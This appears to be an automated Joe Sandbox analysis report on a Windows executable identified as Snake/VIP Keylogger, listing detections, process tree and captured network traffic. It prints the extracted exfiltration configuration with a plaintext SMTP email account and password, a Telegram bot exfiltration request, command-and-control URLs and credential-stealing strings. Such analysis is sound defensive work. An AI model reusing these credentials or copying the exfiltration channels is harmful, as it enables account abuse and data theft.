Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7DI4iYwcvw.exe

Overview

General Information

Sample name:7DI4iYwcvw.exe
renamed because original name is a hash value
Original sample name:2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176.exe
Analysis ID:1529912
MD5:e142f0bf6c0d9be52f8c7f52007c64d0
SHA1:36d40ea847e5f16424951fc9a5bd19f739705c87
SHA256:2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7DI4iYwcvw.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\7DI4iYwcvw.exe" MD5: E142F0BF6C0D9BE52F8C7F52007C64D0)
    • RegSvcs.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\7DI4iYwcvw.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    2.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2df83:$a1: get_encryptedPassword
                    • 0x2e2a0:$a2: get_encryptedUsername
                    • 0x2dd93:$a3: get_timePasswordChanged
                    • 0x2de9c:$a4: get_passwordField
                    • 0x2df99:$a5: set_encryptedPassword
                    • 0x2f639:$a7: get_logins
                    • 0x2f59c:$a10: KeyLoggerEventArgs
                    • 0x2f201:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 2 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7020, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49736

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-09T14:45:17.147222+020028033053Unknown Traffic192.168.2.1249713188.114.96.3443TCP
                    2024-10-09T14:45:19.102713+020028033053Unknown Traffic192.168.2.1249715188.114.96.3443TCP
                    2024-10-09T14:45:23.944483+020028033053Unknown Traffic192.168.2.1249722188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-09T14:45:15.644619+020028032742Potentially Bad Traffic192.168.2.1249711193.122.6.16880TCP
                    2024-10-09T14:45:16.566496+020028032742Potentially Bad Traffic192.168.2.1249711193.122.6.16880TCP
                    2024-10-09T14:45:17.798405+020028032742Potentially Bad Traffic192.168.2.1249714193.122.6.16880TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 7DI4iYwcvw.exeAvira: detected
                    Found malware configuration
                    Source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
                    Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
                    Multi AV Scanner detection for submitted file
                    Source: 7DI4iYwcvw.exeReversingLabs: Detection: 65%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: 7DI4iYwcvw.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: 7DI4iYwcvw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49712 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49712 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49733 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49735 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00FDF45Dh2_2_00FDF2C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00FDF45Dh2_2_00FDF4AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00FDFC19h2_2_00FDF961
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BE0A9h2_2_061BDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061B31E0h2_2_061B2DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061B0D0Dh2_2_061B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061B1697h2_2_061B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061B2C19h2_2_061B2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BE959h2_2_061BE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BF209h2_2_061BEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BCF49h2_2_061BCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BD7F9h2_2_061BD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061B31E0h2_2_061B2DC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BE501h2_2_061BE258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BEDB1h2_2_061BEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BF661h2_2_061BF3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BFAB9h2_2_061BF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_061B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BD3A1h2_2_061BD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061B31E0h2_2_061B310E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 061BDC51h2_2_061BD9A8

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.12:49736 -> 46.151.208.21:587
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49714 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49711 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49713 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49715 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49722 -> 188.114.96.3:443
                    Source: global trafficTCP traffic: 192.168.2.12:49736 -> 46.151.208.21:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49712 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49712 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49733 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: mail.irco.com.sa
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 09 Oct 2024 12:45:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000002.00000002.4794609569.0000000000C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: RegSvcs.exe, 00000002.00000002.4794763868.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enM
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.irco.com.sa
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000299E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002857000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
